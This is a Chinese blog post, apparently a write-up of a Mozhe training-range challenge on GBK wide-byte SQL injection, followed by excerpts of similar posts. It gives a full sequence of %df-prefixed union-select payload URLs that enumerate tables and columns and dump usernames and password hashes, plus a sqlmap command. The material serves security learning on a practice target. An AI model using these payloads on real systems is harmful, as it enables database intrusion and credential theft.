墨者 - SQL注入漏洞测试(宽字节)

最新推荐文章于 2024-10-04 14:43:27 发布
最新推荐文章于 2024-10-04 14:43:27 发布
阅读量1k 收藏
点赞数
分类专栏: 墨者刷题笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39936434/article/details/95079968
版权

原理

  因为当想构造单引号 ‘ 的时候,被转义成 \' ,无法构造sql查询语句。

解决核心思想

  当数据库编码为GBK的时候,在构造的单引号前加上%df,因为反斜杠的编码为%5c,%df%5c可以构造成一个繁体字"逮",单引号可以成功逃逸。

 

/new_list.php?id=1%df%27,单引号成功逃逸

 /new_list.php?id=1%df' order by 1-- + 没报错

 

测试测到有5个字段

 

 /new_list.php?id=-1%df' union select 1,2,3,4,5--+   测试回显位置

 

 

/new_list.php?id=-1%df' union select 1,2,database(),4,5--+ 爆库

 

 new_list.php?id=-1%df' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()),4,5--+  爆表

这里爆字段需要注意一下,因为根据where=’表‘ 查 字段名字,这里用到单引号,这里也会被转义所以会出现以下报错

 所以需要把表名转16进制(前面加上0x)

/new_list.php?id=-1%df' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name=0x73746f726d67726f75705f6d656d626572),4,5--+   爆字段

 

 

最后爆字段值 /new_list.php?id=-1%df' union select 1,2,(select group_concat(password) from stormgroup_member),4,(select group_concat(name) from stormgroup_member)--+

一个一个试一试,MD5在线解密即可 

吃肉唐僧
关注
专栏目录
墨者学院】SQL注入漏洞测试字节
hehigoxqc606的博客
08-31 570
墨者学院】SQL注入漏洞测试字节字节概述: GB2312、GBK、GB18030、BIG5、Shift_JIS等这些都是常说的字节,实际上只有两字节字节带来的安全问题主要是吃ASCII字符(一字节)的现象,即将两个ascii字符误认为是一个字节字符。 思路: 注入点检测:使用and、or、‘,判断是否有注入,是否存在字节注入,是否存在http头注入以及工具检测等。 注入方式:手工注入 实验过程: 第一步:访问靶场链接 第二步:手工注入 http...
墨者-SQL注入漏洞测试(报错盲注)
wh1sper、的博客
07-04 830
墨者-SQL注入漏洞测试前言一、sqlmap二、手注1.报错注入2.时间注入3.联合查询union被过滤总结 前言 本题为墨者学院在线靶场 进入题目发现是个登录界面,找了好久,最后在关于平台停机维护的通知的页面找到了注入点 判断注入类型,当输入?id=1’ and 1=1 %23时,页面显示正常。 ?id=1' and 1=1 %23 当输入?id=1’ and 1=2 %23时,页面显示不正常。 由此判断注入类型为单字符注入。 一、sqlmap 首先先清理sqlmap的缓存。 python sq
墨者学院-SQL注入漏洞测试(字节)
臭nana的博客
12-17 514
字节原理自己百度,这是推荐:http://www.zfsec.cn/2018/09/30/字节注入/ 先构造payload:%df' 报错,存在字节注入 然后加:%df' oder by 5--+或者%df' order by 5%23(#) 5不报错,6报错,所以只有6个字段,联合查询 id=-1%df' union select 1,2,3,4,5%23,发现3,5回显 id=-1%d...
Pikachu-Sql Inject-字节注入
最新发布
guanrongl的专栏
10-04 657
字节注入指的是 mysql 数据库在使用字节(GBK)编码时,会认为两个字符是一个汉字(前一个ascii码要大于128(比如%df),才到汉字的范围),而且当我们输入单引号时,mysql会调用转义函数,将单引号变为',其中\的十六进制是%5c,mysql的GBK编码,会认为%df%5c是一个字节,也就是’運’,从而使单引号闭合(逃逸),进行注入攻击。转义函数:为了过滤用户输入的一些数据,对特殊的字符加上反斜杠“\”进行转义;GBK 是一种多字符的编码,通常来说,一个 gbk 编码汉字,占用2个字节
墨者学院-----SQL注入漏洞测试(字节)
qq_43590351的博客
01-23 565
SQL注入漏洞测试(字节) python2 sqlmap.py -u “http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27” --level 3 --risk 1 --thread 10 python sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3 --tamper unmagicquotes --dbs 字节的注入原理 ...
墨者-SQL注入漏洞测试(字节) 题解
Redredredfish的博客
12-12 628
靶场地址:https://www.mozhe.cn/bug/detail/MEJyQWEyd29tN2ErT1VocThlaUNVdz09bW96aGUmozhe ①url:http://219.153.49.228:46231/new_list.php?id=1 单引号无法闭合,猜测用了转义,尝试字节注入id=1%df' %df与转义符\组合,即url编码%df%5c,mysql会识别为一个GBK编码的汉字運,并不一定非得是%df,由于ascii字符集到%7f为止,所以只要大于%7f即可与转义符组合,例
墨者SQL注入漏洞测试(字节)
wswr的博客
03-10 759
原理:就是用%df去吃掉转义字符 / ,然后就可以正常注入了 思路:还是一样找注入点,过一下,就是找页面源码找注入点,然后什么get啊post什么xff什么的都试试,最后是字节的,所以按照题设就是在可能出现注入的页面加上 %df%27(%27 就是 ’) 然后会发现报错,然后开始一步步注入咯 登入 找注入点通过查看页面源码(突然想到还有一种方法找注入页面,就是用F12然后去找跳转链接有没有存在注入页面,与本题无关QAQ) 然后就%df%27咯,发现注入点 order by 从1..
墨者学院-SQL注入漏洞测试(报错盲注)
weixin_42939822的博客
03-30 5219
墨者学院-SQL注入漏洞测试(报错盲注)
墨者学院-SQL注入漏洞测试(布尔盲注)
weixin_42939822的博客
03-20 4390
决心按部就班、由浅入深地去剖析下sql注入题目提供的靶场环境,完善自身解题思路。本题靶场环境比较简单、也比较常见,没有设置严格的过滤规则,仅仅是限制了页面的回显功能,属于比较初级的sql注入题目。废话不多说啦,先附上题目链接:https://www.mozhe.cn/bug/detail/UDNpU0gwcUhXTUFvQm9HRVdOTmNTdz09bW96aGUmozhe*
墨者学院-SQL注入漏洞测试(报错盲注)
qq_33598708的博客
04-21 2051
启动靶场正常访问: 随便输入账号和密码: 并没有发现什么可用的信息 点击查看公告: 可以看到详细的公告哈!我们看看能不能在公告上做文章。 /new_list.php?id=1 and 1=1 在我以为可以直接注入的时候,我发现1=2的时候也能正常显示哈!!! 然后在找闭合的时候,发现数据库报错的信息会显示出来。所以我们可以利用数据库报错展示出我们想要的数据。 开始注入: updatexml函数错误 updatexml('XML_document',...
SQL注入漏洞测试(字节)
qq_36933272的博客
08-31 215
1.注入类型 http://219.153.49.228:40122/new_list.php?id=-1%df’报错,判断是注入 2.字段数 http://219.153.49.228:40122/new_list.php?id=-1%df’ order by 5 http://219.153.49.228:40122/new_list.php?id=-1%df’ order by 6报错,得...
字节注入讲解-墨者学院(SQL注入漏洞测试(字节))
T1ngSh0w的博客
09-18 5155
字节注入原理讲解+墨者学院(SQL注入漏洞测试(字节))题目详解
SQL注入漏洞测试(字节)解题小记
Routine_limon的博客
07-16 493
字节注入是利用了编码中使用的是Ascii编码,而MySql使用了GBK编码,导致的注入漏洞 单独注入一个单引号: 没有任何反应: 代表了无法注入,主要原因是mysql中的addslashes函数,起作用是:,让’变成’,让引号变得不再是“单引号”,只是一撇而已。一般绕过方式就是,想办法处理’前面的\: 1.想办法给\前面再加一个\(或单数个即可),变成\’,这样\被转义了,'逃出了限制 2.想...
sql注入字节注入
梁顿的专栏
09-27 364
sql注入字节注入
墨者学院(字节注入)
2301_77578012的博客
05-14 916
对于%df表示一个可以与后续进行拼接成中文的字符(所以此项不唯一,只要符合上述字节注入的规则均可以)字段:id,title,content,time,litle,name,password,status。此处id=-1也是为了不让union语句前面逻辑执行,爆出错误便于查看所爆出的列是哪一个。所以开放一下思维:使用id=-2可不可以,或者是10086?--打开靶场我们发现首页并没有明显注入点,我们开始寻找其他的点进行注入。只要没有实际对应的id=参数的页面均可以!执行发现,出现未知列数,缩小范围为5。
webug4.0字节注入-6
weixin_34324081的博客
03-17 233
0x00  前言 GBK是一种多字符编码,一个汉字占2个字节,utf-8编码的汉字占3个字节。 addslashes() 函数会对括号里 (') 、(")、 (\)、 (NULL)、的四个字符添加反斜杠并将其返回。 Mysql有一个特性,在进行GBK编码时会将两个字符认为一个汉字(前提是第一个字符的ASCII大于128才能达到汉字范围)。 如果SQL输入经过了addslashes() 函...
渗透测试-SQL注入字节注入
lza20001103的博客
04-20 9233
渗透测试-SQL注入字节注入
墨者学院之SQL注入漏洞测试(字节)
A_dmin的博客
02-24 1310
实验吧之SQL注入漏洞测试(字节) 首先进入界面,找注入点,找到如下页面: 由于已知是字节注入,直接输入: id=-1%df' 显示: 那么接下来就简单了,按照union注入即可: 判断字段:id=-1%df' order by 5%23(正常) id=-1%df' order by 6%23(报错) 说明只有5个字段 看回显: id=-1%df' union select 1,2,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值